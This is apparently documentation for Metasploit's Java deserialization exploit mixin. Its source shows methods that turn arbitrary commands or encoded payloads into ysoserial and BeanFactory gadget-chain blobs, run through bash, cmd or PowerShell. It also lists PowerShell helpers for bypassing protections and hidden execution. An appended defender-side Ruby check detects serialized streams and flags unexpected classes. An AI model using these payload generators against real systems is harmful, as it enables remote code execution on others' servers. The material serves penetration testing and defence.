Module: Msf::Exploit::JavaDeserialization

Includes: Powershell
Included in: Remote::JndiInjection
Defined in: lib/msf/core/exploit/java_deserialization.rb

Class Method Summary

Instance Method Summary

Methods included from Powershell

#bypass_powershell_protections, #cmd_psh_payload, #compress_script, #decode_script, #decompress_script, #encode_script, #generate_psh_args, #generate_psh_command_line, #initialize, #make_subs, #process_subs, #read_script, #run_hidden_psh

Class Method Details

.gadget_chains ⇒ Object



# File 'lib/msf/core/exploit/java_deserialization.rb', line 69

def self.gadget_chains
  chains = Msf::Util::JavaDeserialization.ysoserial_payload_names
  chains << 'BeanFactory' # not a ysoserial payload, but still supported
  chains.sort
end

Instance Method Details

#generate_java_deserialization_for_command(name, shell, command) ⇒ String

Generate a binary blob that, when deserialized by Java, will execute the specified command using the platform-specific shell. Many deserialization gadget chains pass the command to `Runtime.getRuntime().exec()` as a single string, which limits the characters the command may contain, such as whitespace and quotes. Specifying a shell causes the command to be invoked as an array through that shell, which works around those limitations.

Parameters:

  • name (String)

    The name of the YSoSerial payload to use.

  • shell (String)

    The shell to use for executing the command. Must be one of bash, cmd or powershell.

  • command (String)

    The OS command to execute.

Returns:

  • (String)

    The opaque data blob.



# File 'lib/msf/core/exploit/java_deserialization.rb', line 19

def generate_java_deserialization_for_command(name, shell, command)
  # here we force usage of a modified type to avoid compatibility issues with command characters that are present in
  # some ysoserial payloads
  unless %w{ bash cmd powershell }.include? shell
    raise RuntimeError, 'Invalid shell for Java Deserialization payload generation'
  end

  if name == 'BeanFactory'
    blob = Msf::Util::JavaDeserialization::BeanFactory.generate(command, shell: shell)
  else
    blob = Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: shell)
  end

  blob
end

#generate_java_deserialization_for_payload(name, payload) ⇒ String

Generate a binary blob that, when deserialized by Java, will execute the specified payload. This routine converts the payload automatically based on its platform and architecture. Because of this, not all combinations are supported.

Parameters:

  • name (String)

    The name of the YSoSerial payload to use.

  • payload (Msf::EncodedPayload)

    The payload to execute.

Returns:

  • (String)

    The opaque data blob.

Raises:

  • (RuntimeError)

    Raised if the specified payload cannot be automatically converted to an operating system command.



# File 'lib/msf/core/exploit/java_deserialization.rb', line 45

def generate_java_deserialization_for_payload(name, payload)
  command = nil

  if payload.platform.platforms == [Msf::Module::Platform::Windows]
    if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? payload.arch.first
      command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true })
    elsif payload.arch.first == Rex::Arch::ARCH_CMD
      command = payload.encoded
    end
    shell = 'cmd'
  else
    if payload.arch.first == Rex::Arch::ARCH_CMD
      command = payload.encoded
    end
    shell = 'bash'
  end

  if command.nil?
    raise RuntimeError, 'Could not generate the payload for the platform/architecture combination'
  end

  generate_java_deserialization_for_command(name, shell, command)
end
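
A defender-side check for the kind of blob these methods return, added here as an example and not part of the Metasploit code base: it recognises a Java serialized stream in raw or base64 form and lists the classes it declares that fall outside an allowlist. The `com.example.dto.` allowlist, the helper names and the sample stream are constructed for illustration, and the descriptor scan is a heuristic, not a full stream parser.

```ruby
STREAM_MAGIC = "\xAC\xED\x00\x05".b # Java STREAM_MAGIC + STREAM_VERSION
TC_CLASSDESC = 0x72
CLASS_NAME = /\A\[*[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*;?\z/
# Hypothetical allowlist: the only package this application expects to deserialize.
ALLOWED_PREFIXES = %w[com.example.dto.].freeze

# Return the raw stream if data is, or base64-decodes to, a Java serialized
# object stream; otherwise nil.
def java_stream(data)
  raw = data.b
  return raw if raw.start_with?(STREAM_MAGIC)
  return nil unless raw.start_with?('rO0AB') # base64 form of AC ED 00 05

  decoded = raw.unpack1('m')
  decoded.start_with?(STREAM_MAGIC) ? decoded : nil
end

# Heuristic scan for class descriptors: TC_CLASSDESC, u16 length, class name.
def declared_classes(stream)
  names = []
  i = STREAM_MAGIC.bytesize
  while i < stream.bytesize - 2
    len = stream.byteslice(i + 1, 2).unpack1('n')
    name = stream.byteslice(i + 3, len).force_encoding('UTF-8')
    if stream.getbyte(i) == TC_CLASSDESC && name.bytesize == len &&
       name.valid_encoding? && name.match?(CLASS_NAME)
      names << name
      i += 3 + len
    else
      i += 1
    end
  end
  names.uniq
end

# nil when data is not a serialized stream, else the classes outside the allowlist.
def unexpected_classes(data, allowed = ALLOWED_PREFIXES)
  stream = java_stream(data)
  return nil if stream.nil?

  declared_classes(stream).reject { |n| allowed.any? { |p| n.start_with?(p) } }
end

# Constructed sample: minimal stream declaring one field-less serializable class.
def sample_stream(class_name)
  STREAM_MAGIC + [0x73, TC_CLASSDESC, class_name.bytesize].pack('CCn') +
    class_name.b + ("\x00" * 8) + [0x02, 0, 0x78, 0x70].pack('CnCC')
end
```

A non-empty result from `unexpected_classes` is a reason to reject or log the input before it reaches `ObjectInputStream`; on the Java side the same policy is enforced with an `ObjectInputFilter` allowlist.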